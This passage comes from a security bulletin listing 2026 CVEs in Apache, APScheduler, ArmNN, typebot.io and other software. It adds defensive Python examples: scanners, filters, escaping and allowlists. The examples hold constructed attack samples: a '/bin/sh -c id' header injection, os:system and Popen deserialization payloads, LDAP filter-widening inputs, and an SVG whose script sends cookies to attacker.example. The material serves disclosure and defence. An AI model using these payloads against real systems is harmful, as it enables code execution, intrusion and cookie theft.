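    print(collides("warehouse", "data-eng", "data-eng/warehouse", None, secret_path_before))  # True
    print(resolve_or_reject("warehouse", "data-eng"))
    print(resolve_or_reject("data-eng/warehouse", None))
```

Changing the separator alone would not be enough: a caller without team context could still ask for `data-eng--warehouse`, which is why the fix also rejects team-shaped identifiers in that situation.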
 
Apache Software Foundation–Apache Airflow CNCF Kubernetes provider JWT tokens used by workers in Kubernetes Executors were exposed to users who had read-only access to Kubernetes Pods. This could allow users with only read-only access to perform actions that were meant to be available solely to running tasks via the Task SDK, and potentially to modify the state of the Airflow database for tasks. 2026-05-19 not yet calculated CVE-2026-27173 https://github.com/apache/airflow/pull/60108
https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw
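The practical check for the Airflow Kubernetes entry above is whether a worker Pod's spec carries a token in a field that `get pods` exposes (env values, `command`, `args`). The scanner below is an added example, not Airflow or Kubernetes code: the Pod manifest, the env var name `WORKER_TOKEN` and the sample token are constructed, and the token is detected by shape (three base64url segments, JSON header starting with `eyJ`) and decoded without signature verification, since the point is only to learn what leaked.

```python
import base64
import json
import re
from typing import Dict, List

# Three base64url segments; any JSON header ('{"...') encodes to a segment starting with "eyJ".
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*")


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_claims(token: str) -> dict:
    """Read the payload segment; no verification, we only want to know what was exposed."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def make_demo_token(claims: dict) -> str:
    """Constructed sample token: real header/payload encoding, placeholder signature."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    return f"{header}.{_b64url_encode(json.dumps(claims).encode())}.placeholdersig"


def find_tokens_in_pod(pod: dict) -> List[Dict[str, object]]:
    """Report JWT-shaped literals in env values, command and args of every container.
    Anyone holding 'get'/'list' on pods in the namespace can read all of these fields."""
    hits: List[Dict[str, object]] = []
    spec = pod.get("spec", {})
    for kind in ("initContainers", "containers"):
        for c in spec.get(kind, []):
            places = [(f"env:{e['name']}", e.get("value", "")) for e in c.get("env", [])]
            places += [(f"{f}[{i}]", s) for f in ("command", "args")
                       for i, s in enumerate(c.get(f, []))]
            for where, text in places:
                for m in JWT_RE.finditer(text):
                    hits.append({"container": c["name"], "where": where,
                                 "claims": decode_claims(m.group(0))})
    return hits


# Constructed worker Pod: one token pasted into an env value (visible to any pod reader) and
# one credential delivered through secretKeyRef (nothing readable in the Pod spec itself).
DEMO_POD = {
    "metadata": {"name": "run-task-42"},
    "spec": {"containers": [{
        "name": "worker",
        "args": ["airflow", "tasks", "run", "example_dag", "extract", "2026-05-18"],
        "env": [
            {"name": "WORKER_TOKEN", "value": make_demo_token({"sub": "task-run-42", "exp": 1900000000})},
            {"name": "DB_PASSWORD", "valueFrom": {"secretKeyRef": {"name": "db", "key": "password"}}},
        ],
    }]},
}

if __name__ == "__main__":
    for hit in find_tokens_in_pod(DEMO_POD):
        print(hit["container"], hit["where"], hit["claims"])
```

Run this over `kubectl get pods -o json` output for the executor namespace to find which pods still carry literal tokens; the remediation is to deliver the credential through a Secret or projected volume, where reading it requires a separate RBAC grant on secrets.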
 
Apache Software Foundation–Apache Camel Camel-CXF and Camel-Knative Message Header Injection via Missing Inbound Filtering The CXF and Knative HeaderFilterStrategy implementations (CxfRsHeaderFilterStrategy in camel-cxf-rest, CxfHeaderFilterStrategy in camel-cxf-transport, and KnativeHttpHeaderFilterStrategy in camel-knative-http) only filter outbound Camel-internal headers via setOutFilterStartsWith, while not configuring inbound filtering via setInFilterStartsWith. As a result, an unauthenticated attacker can inject Camel-internal headers (e.g. CamelExecCommandExecutable, CamelFileName) via HTTP requests to CXF-RS or CXF-SOAP endpoints. When a route forwards messages from these endpoints to header-driven components such as camel-exec or camel-file, the injected headers override configured values, enabling remote code execution or arbitrary file writes. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177), the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891), and non-HTTP strategies (CVE-2026-40453). This issue affects Apache Camel: from 3.18.0 before 4.14.6, from 4.15.0 before 4.18.2. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.2. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. 2026-05-19 not yet calculated CVE-2026-47323 https://camel.apache.org/security/CVE-2026-47323.html
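The Camel entry above describes a filter that is applied in only one direction. The Python model below is an added illustration of that mechanism, not Camel's Java classes: the `HeaderFilterStrategy` class, the `render-gerber` executable and the attacker request are constructed, and the simplifying assumption is that the `camel-exec` component reads its executable from the `CamelExecCommandExecutable` message header when present, as the advisory states.

```python
from typing import Dict, Tuple


class HeaderFilterStrategy:
    """Prefix-based filtering on the way in (transport -> Camel message) and on the way out.
    Demo model only; the real strategies are Java classes in the Camel components."""

    def __init__(self, in_filter_starts_with: Tuple[str, ...] = (),
                 out_filter_starts_with: Tuple[str, ...] = ()):
        self.in_prefixes = tuple(p.lower() for p in in_filter_starts_with)
        self.out_prefixes = tuple(p.lower() for p in out_filter_starts_with)

    def apply_in(self, headers: Dict[str, str]) -> Dict[str, str]:
        # HTTP header names are case-insensitive, so the prefix match must be too.
        # With no inbound prefixes configured, str.startswith(()) is always False: nothing is dropped.
        return {k: v for k, v in headers.items() if not k.lower().startswith(self.in_prefixes)}

    def apply_out(self, headers: Dict[str, str]) -> Dict[str, str]:
        return {k: v for k, v in headers.items() if not k.lower().startswith(self.out_prefixes)}


CONFIGURED_EXECUTABLE = "/usr/local/bin/render-gerber"  # hypothetical route configuration


def exec_component(message_headers: Dict[str, str]) -> str:
    """camel-exec in miniature: a message header, when present, overrides the configured executable."""
    return message_headers.get("CamelExecCommandExecutable", CONFIGURED_EXECUTABLE)


def route(strategy: HeaderFilterStrategy, request_headers: Dict[str, str]) -> str:
    """from("cxfrs:...").to("exec:...") with the strategy applied to the inbound request."""
    message = strategy.apply_in(request_headers)
    return exec_component(message)


# Constructed attacker request: Camel-internal headers injected over plain HTTP.
ATTACK_REQUEST = {
    "Content-Type": "application/json",
    "CamelExecCommandExecutable": "/bin/sh",
    "CamelExecCommandArgs": "-c id",
}

VULNERABLE = HeaderFilterStrategy(out_filter_starts_with=("Camel",))   # outbound-only filtering
FIXED = HeaderFilterStrategy(in_filter_starts_with=("Camel",), out_filter_starts_with=("Camel",))

if __name__ == "__main__":
    print("outbound-only filter executes:", route(VULNERABLE, ATTACK_REQUEST))
    print("inbound+outbound filter executes:", route(FIXED, ATTACK_REQUEST))
```

When upgrading is not immediately possible, the same effect can be had by configuring an inbound prefix filter on the endpoint's strategy, or by removing `Camel*` headers with a `removeHeaders` step before any header-driven component.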
 
Apache Software Foundation–Apache Camel K (Externally Controlled Reference to a Resource in Another Sphere), (Authorization Bypass Through User-Controlled Key) vulnerability in Apache Camel K. Authorized users in a Kubernetes namespace can create a Build resource, controlling the Pod generation in a namespace of their choice, including the operator namespace. This issue affects Apache Camel K: from 2.0.0 before 2.8.1, from 2.9.0 before 2.9.2, from 2.10.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1 (or 2.8.1 or 2.9.2), which fixes the issue. 2026-05-21 not yet calculated CVE-2026-45760 https://camel.apache.org/security/CVE-2026-45760.html
 
Apache Software Foundation–Apache CXF The fix for CVE-2025-48913: Apache CXF: Untrusted JMS configuration can lead to RCE was not complete, meaning that another path in the code might lead to code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. 2026-05-22 not yet calculated CVE-2026-44417 https://lists.apache.org/thread/bqg6gjy2cx7rfyqjxcpv3jwjvmclvz4o
 
Apache Software Foundation–Apache CXF Insecure XML parser configuration in Apache CXF’s WS-Transfer module may allow attackers to perform XXE attacks. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. 2026-05-22 not yet calculated CVE-2026-44618 https://lists.apache.org/thread/c7vb015f8ljmjl44030mn0yfq71f7sd7
 
Apache Software Foundation–Apache CXF An LDAP injection vulnerability in the LDAP Certificate repository of the XKMS server in Apache CXF may allow an attacker to retrieve arbitrary certificates from the repository.  Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. 2026-05-22 not yet calculated CVE-2026-44930 https://lists.apache.org/thread/c1zqxppo1m5z3kbdhjn5p991zk09ynkh
 
Apache Software Foundation–Apache Fory Deserialization of untrusted data in Apache Fory PyFory. PyFory’s ReduceSerializer could bypass the documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes. This issue affects Apache Fory: versions before 1.0.0. Mitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue. 2026-05-21 not yet calculated CVE-2026-48207 https://fory.apache.org/security/#cve-2026-48207-pyfory-reduceserializer-deserializationpolicy-bypass
 
Apache Software Foundation–Apache OFBiz Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. Please note that in the updated version, “Data Resource” records with dataTemplateTypeId = “FTL” are no longer supported. Additionally, in the updated version, the “Ecommerce Customer” security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well. 2026-05-19 not yet calculated CVE-2026-29207 https://lists.apache.org/thread/3rcrp8bh3x6ovrj5xnc0fm1f0nrn52r0
 
Apache Software Foundation–Apache OFBiz Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-29220 https://lists.apache.org/thread/5hjnmt9no6mmtg8sxq3mhonzff1vkd5m
 
Apache Software Foundation–Apache OFBiz Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz via Content component operations. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-29226 https://lists.apache.org/thread/6707wys8jxzmowxggn4cmtwwk9ygl2tr
 
Apache Software Foundation–Apache OFBiz Improper Input Validation vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31378 https://lists.apache.org/thread/cbl8qkqtxv90m6ssfwd58bnoh933v38t
 
Apache Software Foundation–Apache OFBiz Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’), Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’), Improper Control of Generation of Code (‘Code Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31379 https://lists.apache.org/thread/1tcnkxjm0s6n1ohfb21brl25dt0hv9by
 
Apache Software Foundation–Apache OFBiz Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31380 https://lists.apache.org/thread/v2brvq1tf4q491obkxv8p7fc5qfshc08
 
Apache Software Foundation–Apache OFBiz Improper Authentication vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31387 https://lists.apache.org/thread/3wgybgdvmbfvly24zm4sb4y53fc1pqcf
 
Apache Software Foundation–Apache OFBiz Improper Access Control vulnerability in Apache OFBiz in multi-tenant deployments. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31388 https://lists.apache.org/thread/npjchvnpnosoqpto46s2om12jd9s7py7
 
Apache Software Foundation–Apache OFBiz Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31906 https://lists.apache.org/thread/1fblqdo89d3ps8kgtcnkcq8sh7gwkcpn
 
Apache Software Foundation–Apache OFBiz Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31909 https://lists.apache.org/thread/0hpopzz1qrhkzsbt3ncofs6qo0545r2h
 
Apache Software Foundation–Apache OFBiz Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31910 https://lists.apache.org/thread/2smc4c4o056ovd2hoq1l29593y5y29vh
 
Apache Software Foundation–Apache OFBiz Use of Hard-coded Cryptographic Key vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-31986 https://lists.apache.org/thread/2hl9xoqm8tq8b22x6vnmtp7tg3opcqgc
 
Apache Software Foundation–Apache OFBiz Improper Control of Generation of Code (‘Code Injection’) vulnerability in email services of Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-35086 https://lists.apache.org/thread/g0s37yhnh2xwfts400crb2w8s337hgjx
 
Apache Software Foundation–Apache OFBiz Improper Neutralization of Special Elements used in an LDAP Query (‘LDAP Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-41919 https://lists.apache.org/thread/592czh9o69n74c036vy30fnqknocw74p
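Both the Apache CXF XKMS entry (LDAP certificate repository) and the OFBiz LDAP injection entry above come down to caller-controlled text being placed into a search filter without RFC 4515 escaping. The following is an added Python illustration, not code from either project: the `pkiUser`/`cn` filter shape and the sample subjects are constructed.

```python
import re

# RFC 4515 section 3: these characters must be escaped inside an assertion value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a value destined for an LDAP search filter so it can only ever match literally."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def cert_filter_unescaped(subject_cn: str) -> str:
    """The injectable pattern: caller-controlled text interpolated straight into the filter."""
    return f"(&(objectClass=pkiUser)(cn={subject_cn}))"


def cert_filter(subject_cn: str) -> str:
    """Same query with the value escaped; structure of the filter is now fixed."""
    return f"(&(objectClass=pkiUser)(cn={escape_filter_value(subject_cn)}))"


_ASSERTION_RE = re.compile(r"\([A-Za-z][\w.;-]*[~<>]?=[^()]*\)")


def assertion_count(ldap_filter: str) -> int:
    """Count '(attr=value)' assertions; an input that adds one has changed the query's shape."""
    return len(_ASSERTION_RE.findall(ldap_filter))


if __name__ == "__main__":
    # Constructed inputs: a wildcard that returns every certificate, and a value that
    # closes the assertion and opens a new one.
    for subject in ("alice", "*", "x)(cn=*"):
        print(f"{subject!r:12} raw: {cert_filter_unescaped(subject)}")
        print(f"{'':12} esc: {cert_filter(subject)}  assertions={assertion_count(cert_filter(subject))}")
```

Escaping for a filter differs from escaping for a distinguished name (RFC 4514), so a value that ends up in a base DN needs the other table; and a presence check (`(cn=*)`) is still a legitimate filter, which is why the wildcard must be neutralised by escaping rather than by rejecting parentheses alone.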
 
Apache Software Foundation–Apache OFBiz Improper Authorization vulnerability in Apache OFBiz Webtools. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-45187 https://lists.apache.org/thread/pcmfyxjyk7dg0btxqg9h7cr30yg8mr7k
 
Apache Software Foundation–Apache OFBiz Improper Authentication vulnerability in Apache OFBiz via a password-change logic flaw leading to remote code execution. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-45434 https://lists.apache.org/thread/yw4owrzl0yho1yx7oqxvr6xjkmln9tq8
 
Apache Software Foundation–Apache OFBiz Improper Control of Generation of Code (‘Code Injection’), Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-46586 https://lists.apache.org/thread/7mgjl81nrpxqtfcg6h5qtrx7wztbl4js
 
Apple–Private Cloud Compute Server Software An attacker in a privileged network position may be able to leak sensitive information. A path handling issue was addressed with improved validation. This issue is fixed in PCC Release 5E290.3. 2026-05-18 not yet calculated CVE-2026-20685 https://security.apple.com/documentation/private-cloud-compute/releasenotes#darwin-init
 
APScheduler–JSONSerializer and CBORSerializer The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers. 2026-05-19 not yet calculated CVE-2026-31072 https://github.com/agronholm/apscheduler
https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6
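The PyFory entry (CVE-2026-48207) and the APScheduler entry (CVE-2026-31072) above describe the same primitive from two angles: a serializer that resolves a `module:qualname` reference and either calls it (the reduce path) or instantiates it and feeds it attacker state via `__setstate__`, with the policy hook missing on one of those paths. The code below is an added example, not from either project: the payload format (`__type__`/`__state__` and `__reduce__` keys), the `Job` class and the policy class are constructed to show the difference between checking one path and checking both.

```python
import importlib
from typing import Any, Dict, Optional, Set


def resolve_ref(ref: str) -> Any:
    """'module:qualname' -> object, with no restriction. This is the dangerous primitive."""
    module_name, _, qualname = ref.partition(":")
    obj: Any = importlib.import_module(module_name)
    for part in qualname.split("."):
        obj = getattr(obj, part)
    return obj


def _restore(cls: type, state: Dict[str, Any]) -> Any:
    obj = cls.__new__(cls)
    if hasattr(obj, "__setstate__"):
        obj.__setstate__(state)          # class-controlled code runs on attacker-controlled state
    else:
        obj.__dict__.update(state)
    return obj


def unmarshal_unrestricted(payload: dict) -> Any:
    """Reconstructed shape of the unsafe behaviour: any callable, any class, any state."""
    if "__reduce__" in payload:
        callable_ref, args = payload["__reduce__"]
        return resolve_ref(callable_ref)(*args)
    return _restore(resolve_ref(payload["__type__"]), payload["__state__"])


class DeserializationPolicy:
    """Allowlist of references that may be resolved. Hypothetical, modelled on the idea of a policy hook."""

    def __init__(self, allowed: Set[str]):
        self.allowed = set(allowed)

    def check(self, ref: str) -> None:
        if ref not in self.allowed:
            raise PermissionError(f"reference {ref!r} not allowed by policy")


def unmarshal_restricted(payload: dict, policy: DeserializationPolicy) -> Any:
    """Every resolution path, the type path and the reduce path, goes through the same hook."""
    if "__reduce__" in payload:
        callable_ref, args = payload["__reduce__"]
        policy.check(callable_ref)                       # the check the bypass skipped
        return resolve_ref(callable_ref)(*args)
    policy.check(payload["__type__"])
    state = payload["__state__"]
    if not isinstance(state, dict):
        raise TypeError("state must be a mapping")
    return _restore(resolve_ref(payload["__type__"]), state)


class Job:
    """A legitimate, allowlisted type for the demo."""

    def __init__(self, name: str):
        self.name = name

    def __setstate__(self, state: Dict[str, Any]) -> None:
        self.__dict__.update(state)


JOB_REF = f"{Job.__module__}:{Job.__qualname__}"
POLICY = DeserializationPolicy({JOB_REF})

# Constructed payloads: one benign, two that reach outside the allowlist.
BENIGN_PAYLOAD = {"__type__": JOB_REF, "__state__": {"name": "nightly-report"}}
POPEN_PAYLOAD = {"__type__": "subprocess:Popen", "__state__": {"args": ["id"]}}
REDUCE_PAYLOAD = {"__reduce__": ["os:system", ["id"]]}


def describe(payload: dict, policy: Optional[DeserializationPolicy] = None) -> str:
    """Summarise the outcome without letting an exception escape (used by the demo and tests)."""
    try:
        obj = unmarshal_restricted(payload, policy) if policy else unmarshal_unrestricted(payload)
        return f"ok {type(obj).__name__}"
    except PermissionError as e:
        return f"rejected {e}"


if __name__ == "__main__":
    print(describe(BENIGN_PAYLOAD, POLICY))
    print(describe(POPEN_PAYLOAD, POLICY))
    print(describe(REDUCE_PAYLOAD, POLICY))
    print("reachable without a policy:", resolve_ref("os:system"))
```

The unrestricted path is deliberately never called on the two hostile payloads here; `resolve_ref("os:system")` alone shows that any importable attribute is one string away, which is why the check has to sit in front of every resolution, not just the one the author first thought of.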
 
Arm–ArmNN In Arm ArmNN through 2026-03-27, an integer overflow in TensorShape::GetNumElements() in armnn/Tensor.cpp allows a crafted TFLite model file to bypass buffer size validation and trigger a heap-based buffer over-read during model optimization. The overflow occurs when multiplying tensor dimensions using 32-bit unsigned arithmetic without overflow detection, causing GetNumBytes() to return an understated allocation size. During Optimize()->InferOutputShapes(), the BatchToSpaceNdLayer reads beyond the allocated buffer. 2026-05-22 not yet calculated CVE-2026-42627 https://github.com/ARM-software/armnn/blob/main/src/armnn/Tensor.cpp
https://github.com/ARM-software/armnn/blob/main/src/armnnTfLiteParser/TfLiteParser.cpp
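The ArmNN entry above is a multiplication in 32-bit unsigned arithmetic whose wrapped result makes the byte-count check pass. The Python below is an added example, not ArmNN code (which is C++): it mirrors the wrapping product with an explicit 32-bit mask, then shows the overflow-checked form a parser should use before trusting a model's declared buffer sizes. The shapes and element size are constructed.

```python
from typing import Sequence

MASK32 = 0xFFFFFFFF


def num_elements_wrapping(shape: Sequence[int]) -> int:
    """Product of dimensions in 32-bit unsigned arithmetic with no overflow check (the bug's shape)."""
    n = 1
    for d in shape:
        n = (n * d) & MASK32
    return n


def num_elements_checked(shape: Sequence[int]) -> int:
    """Same product, refusing any step whose result would not fit in 32 bits."""
    n = 1
    for d in shape:
        if d < 0:
            raise ValueError(f"negative dimension in shape {tuple(shape)}")
        if d != 0 and n > MASK32 // d:      # n * d > 2**32 - 1 without computing it
            raise OverflowError(f"element count overflows 32 bits for shape {tuple(shape)}")
        n *= d
    return n


def validate_tensor_buffer(shape: Sequence[int], element_size: int, buffer_len: int) -> int:
    """Return the byte count the model buffer must hold, or raise. Run before reading tensor data."""
    elems = num_elements_checked(shape)
    if element_size != 0 and elems > MASK32 // element_size:
        raise OverflowError("byte size overflows 32 bits")
    needed = elems * element_size
    if buffer_len < needed:
        raise ValueError(f"buffer of {buffer_len} bytes cannot hold {needed} bytes")
    return needed


def check_tensor_buffer(shape: Sequence[int], element_size: int, buffer_len: int) -> str:
    """String summary of the validation outcome for demos and tests."""
    try:
        return f"ok {validate_tensor_buffer(shape, element_size, buffer_len)}"
    except (OverflowError, ValueError) as e:
        return f"rejected {e}"


if __name__ == "__main__":
    # Constructed shapes: a normal image tensor, and one whose element count is exactly 2**32.
    normal, crafted = (1, 224, 224, 3), (65536, 65536)
    print("wrapping count for crafted shape:", num_elements_wrapping(crafted))   # 0: any buffer "fits"
    print(check_tensor_buffer(normal, 4, 602112))
    print(check_tensor_buffer(crafted, 4, 1024))
```

A 1 KiB buffer passes the wrapping check for the crafted shape because the understated count is zero; the later layer that walks the tensor by its real dimensions then reads far past the allocation, which is the over-read the advisory describes.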
 
awesomemotive–NextGEN Gallery NextGEN Gallery versions prior to 4.2.1 are vulnerable to authenticated SQL injection via the ‘orderby’ parameter on the REST API endpoints ‘/imagely/v1/galleries’ and ‘/imagely/v1/albums’. The root cause is an insufficient sanitization function (‘_clean_column()’) in the data mapper layer that uses a character blacklist instead of a whitelist approach. This allows an authenticated attacker with the ‘NextGEN Gallery overview’ capability (assigned to the Administrator role by default) to inject arbitrary SQL into the ‘ORDER BY’ clause. 2026-05-20 not yet calculated CVE-2026-9059 https://www.tenable.com/security/research/tra-2026-42
 
baptisteArno–typebot.io TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and renders them directly when they are accessed through the domain. By uploading a crafted SVG file containing embedded JavaScript, an attacker can execute arbitrary JavaScript code in victims’ browsers. The payload is persistently stored on the application’s infrastructure (app.typebot.io) and reachable from a public-facing, permanent link, enabling session/token theft, account takeover, and exfiltration of sensitive user data. This issue has been fixed in version 3.16.0. 2026-05-22 not yet calculated CVE-2026-39970 https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-jj87-c343-26vp
https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0
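For the typebot.io entry above, the two controls a practitioner wants are a content check at upload time and response headers that keep a user-supplied SVG from executing even if the check misses something. The code below is an added example, not typebot.io code; it uses only the standard library's `xml.etree` (which does not resolve external entities but is not hardened against entity expansion, so production code should parse with `defusedxml`), and the sample SVG documents are constructed.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

SVG_NS = "http://www.w3.org/2000/svg"
ACTIVE_CONTENT_TAGS = {"script", "foreignObject"}


def _local(qualified: str) -> str:
    """'{namespace}name' -> 'name'."""
    return qualified.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> List[str]:
    """Return a list of reasons to reject the upload; an empty list means nothing active was found."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as e:
        return [f"not well-formed XML: {e}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]
    findings: List[str] = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_CONTENT_TAGS:
            findings.append(f"<{tag}> element")
        for attr, val in el.attrib.items():
            name = _local(attr).lower()
            value = val.strip().lower()
            if name.startswith("on"):                                   # onload, onclick, ...
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and value.startswith(("javascript:", "data:")):
                findings.append(f"{name}={val!r} on <{tag}>")
    return findings


def upload_response_headers() -> Dict[str, str]:
    """Headers for serving user-uploaded SVGs: no script execution, no inline rendering as a page."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": "attachment",          # never rendered as a navigable document
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "X-Content-Type-Options": "nosniff",
    }


# Constructed samples
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="1" y="10">profile</text></a>
</svg>"""

BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, svg_findings(doc) or "clean")
```

Serving uploads from a separate origin (a dedicated media host) on top of the headers above means that even an SVG that slips through cannot read the application's cookies or storage.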
 
Best Practical–Request Tracker Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the “Page” parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim’s browser. This vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2. 2026-05-21 not yet calculated CVE-2026-6841 https://cert.pl/en/posts/2026/05/CVE-2026-6841
https://requesttracker.com/request-tracker/
https://docs.bestpractical.com/release-notes/rt/5.0.10
https://docs.bestpractical.com/release-notes/rt/6.0.3
 
BillaBear–BillaBear BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands. 2026-05-19 not yet calculated CVE-2026-31069 https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e
https://github.com/BillaBear/billabear
https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9
 
brainstormforce–Surecart SureCart versions prior to 4.2.1 are vulnerable to authenticated SQL injection via multiple parameters (‘model_name’, ‘model_id’, ‘integration_id’, ‘provider’) on the REST API endpoint ‘/surecart/v1/integrations/{id}’. The root cause is a flawed escaping bypass in the query builder (‘wp-query-builder’). Values passed to the ‘where()’ method are only sanitized via ‘$wpdb->prepare()’ when they do **not** contain a dot (‘.’) or the WordPress table prefix (‘wp_’). By including a dot anywhere in the payload, an attacker completely bypasses the escaping logic and injects arbitrary SQL into the ‘WHERE’ clause, allowing full UNION-based extraction of the database. 2026-05-20 not yet calculated CVE-2026-9065 https://www.tenable.com/security/research/tra-2026-43
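The NextGEN Gallery, BillaBear and SureCart entries above share one lesson: a character blacklist on an `ORDER BY` column, a raw `sprintf()` of a filter key, and an escaping routine that switches itself off for values containing a dot all fail because they try to sanitise text that is going to become SQL structure, rather than allowlisting identifiers and parameterising values. The following is an added example using SQLite, not code from any of the three plugins; the `galleries`/`users` schema, the `_clean_column`-style blacklist and the probe payload are constructed.

```python
import re
import sqlite3
from typing import Callable, List, Union

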